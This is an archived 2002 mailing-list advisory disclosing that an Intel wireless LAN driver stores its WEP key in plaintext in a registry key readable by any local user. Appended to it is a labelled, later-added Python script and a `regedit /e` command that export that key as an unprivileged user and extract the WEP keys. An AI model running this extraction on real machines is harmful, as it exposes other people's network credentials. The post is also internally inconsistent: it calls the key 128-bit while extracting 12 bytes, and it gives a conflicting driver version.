Intel WLAN Driver storing 128bit WEP-Key in plain text!

From: dario luethi (dlu@remote-exploit.org)
Date: Mon Jan 28 2002 - 02:06:43 PST

    Intro:
    While doing some troubleshooting I found a bug on a Compaq Evo N600c with an integrated 802.11b card connected via USB (on the back of the display), running as "Intel(R) PRO/Wireless 2011B LAN USB Device".
    
    Description:
    The WEP key is stored in plaintext in the registry. The permissions on the specific key are weak enough that every local user has read access and can extract it via regedit.exe or an equivalent tool. A driver from another vendor (for example: Actiontec PrismII) stores the 128-bit key in an encrypted form in the same place in the registry.
    
    Howto:

    Easy way:
    If you open the properties dialog of your WLAN card and click the "Advanced" tab, you find an entry displaying the WEP key in plaintext (only as administrator). A normal user doesn't have access to this "Advanced" tab. This happened with the latest driver version from the Compaq support page (version 1.5.16.0). I tried the latest driver from Intel, which is version 1.5.18.0 (downloaded on 24th January 2002). The newer release fixed one part by no longer showing the entry in the "Advanced" tab.
    
    Way that works every time:
    Let's look at the registry.

    General:

    The security policies on

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008]

    Owner: local Administrator
    Owner group: local Administrators

    Permissions

    Name                   Permission     Apply to
    local Administrator    Full Control   This key and subkeys
    local Power Users      Read           This key and subkeys
    local Users            Read           This key and subkeys
    Owner                  Full Control   Subkeys only
    System                 Full Control   This key and subkeys
    
    
    but if you look at the registry under

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008]
    ^^ look for your correct device section ^^

    (no matter which of the two noted driver versions is used)

    you find the string entry
    "DefaultKeys"="364e01815b300d8038abc5ff00000000000000"

    where the first 12 hex values show the WEP key in plaintext:
    "364e01815b300d8038abc5ff"
    
    
    On another system with the new driver (1.15.18.0), additional keys were added under the same context noted above: "Profiles\Default\WepKey"
    "Key128"="2544801583660d7009abcdef00000000000000"
    "DefKeyId128"="1"

    If this WEP key belongs to anyone, I apologize. This key was freely invented by my fingers on the keyboard!
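
The extraction the post describes, as an added example that is not part of the original message: a small Python script that reads a regedit export (the kind any local user with read access can produce with regedit.exe), walks every device instance under the network-adapter class GUID named above, and pulls out both the root-level DefaultKeys string and the Key128/DefKeyId128 values under Profiles\Default\WepKey, taking the first 12 hex values as the key the way the post does. The registry paths and value names come from the post; the SAMPLE_REG text is a constructed .reg export that embeds the post's invented key values next to a hypothetical wired adapter, so the script runs offline. The DriverVersion value and the wired adapter's DriverDesc are assumptions, not something the post shows.

```python
"""Pull WEP keys out of a regedit export of the network-adapter class key.

Added example, not code from the original post. Registry paths and value
names (DefaultKeys, Profiles\\Default\\WepKey\\Key128, DefKeyId128) follow the
post; SAMPLE_REG is a constructed .reg export embedding the post's invented
key values next to a hypothetical wired adapter for contrast.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

NET_CLASS_GUID = "{4D36E972-E325-11CE-BFC1-08002BE10318}"  # "Network adapters" class
KEY_BYTES = 12  # the post reads the first 12 hex values of the string as the key

# Constructed sample, laid out the way regedit.exe writes an export.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007]
"DriverDesc"="Hypothetical wired Ethernet adapter"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008]
"DriverDesc"="Intel(R) PRO/Wireless 2011B LAN USB Device"
"DefaultKeys"="364e01815b300d8038abc5ff00000000000000"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\Profiles\Default\WepKey]
"Key128"="2544801583660d7009abcdef00000000000000"
"DefKeyId128"="1"
'''

_SECTION_RE = re.compile(r'^\[(.+)\]$')
_STRING_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key path: {value name: value}} for the REG_SZ values in a .reg
    file. hex:/dword: values and the default value (@=) are skipped."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", "REGEDIT4", ";")):
            continue
        sec = _SECTION_RE.match(line)
        if sec:
            current = sec.group(1)
            sections.setdefault(current, {})
            continue
        val = _STRING_RE.match(line)
        if val and current is not None:
            # .reg escapes backslash and double quote with a backslash
            sections[current][val.group(1)] = re.sub(r'\\(.)', r'\1', val.group(2))
    return sections


def wep_key_from_value(value: str, key_bytes: int = KEY_BYTES) -> str:
    """Take the leading key_bytes bytes of the zero-padded hex string."""
    digits = value.strip().lower()
    if not re.fullmatch(r'[0-9a-f]+', digits) or len(digits) < 2 * key_bytes:
        raise ValueError("not a padded hex key string: %r" % value)
    return digits[:2 * key_bytes]


@dataclass
class WepFinding:
    device_key: str            # the \NNNN instance key under the class GUID
    driver_desc: str
    value_path: str            # where the key string was read from
    key_hex: str
    default_key_id: Optional[str]


def find_wep_keys(sections: Dict[str, Dict[str, str]],
                  class_guid: str = NET_CLASS_GUID) -> List[WepFinding]:
    """Walk every device instance under the network class and report
    DefaultKeys at the instance root and Key128 under Profiles\\Default\\WepKey."""
    marker = ("\\Control\\Class\\" + class_guid + "\\").upper()
    findings: List[WepFinding] = []
    for path, values in sections.items():
        idx = path.upper().find(marker)
        if idx < 0:
            continue
        rest = path[idx + len(marker):]
        instance = rest.split("\\", 1)[0]
        device_key = path[:idx + len(marker)] + instance
        desc = sections.get(device_key, {}).get("DriverDesc", "?")
        if rest == instance and "DefaultKeys" in values:
            findings.append(WepFinding(device_key, desc, path + "\\DefaultKeys",
                                       wep_key_from_value(values["DefaultKeys"]), None))
        if rest.upper().endswith("\\PROFILES\\DEFAULT\\WEPKEY") and "Key128" in values:
            findings.append(WepFinding(device_key, desc, path + "\\Key128",
                                       wep_key_from_value(values["Key128"]),
                                       values.get("DefKeyId128")))
    return findings


if __name__ == "__main__":
    for f in find_wep_keys(parse_reg_export(SAMPLE_REG)):
        print("%s\n  %s = %s (DefKeyId128: %s)" % (f.driver_desc, f.value_path,
                                                   f.key_hex, f.default_key_id))
```

On a real box you would first export the class key (for example `regedit /e wlan.reg "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}"`) as an unprivileged user and feed that file to parse_reg_export; the fact that the export succeeds at all is the permissions problem the post points at, and the script only shows what falls out of it. The script is deliberately strict about the hex string so that a driver that does encrypt or otherwise encode its key (the Actiontec case mentioned above) raises rather than being misreported as a plaintext key.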
    



    This archive was generated by hypermail 2b30 : Mon Jan 28 2002 - 08:37:24 PST